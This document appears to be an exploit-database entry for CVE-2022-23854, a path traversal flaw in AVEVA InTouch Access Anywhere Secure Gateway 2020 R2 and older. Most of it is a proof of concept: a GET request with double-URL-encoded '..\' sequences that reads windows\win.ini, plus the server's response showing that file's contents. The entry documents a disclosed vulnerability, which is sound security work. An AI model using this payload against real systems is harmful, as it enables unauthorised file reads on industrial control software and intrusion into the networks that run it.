AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal

Author: Jens Regel
type: remote
platform: hardware
port: nan
date_added: 2022-11-11 
date_updated: 2022-11-11 
verified: 0 
codes: CVE-2022-23854 
tags: 
aliases:  
screenshot_url:  
application_url: 

Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
Exploit Author: Jens Regel (CRISEC IT-Security)
Date: 11/11/2022
CVE: CVE-2022-23854
Version: Access Anywhere Secure Gateway versions 2020 R2 and older

Proof of Concept:
GET
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
HTTP/1.1

HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1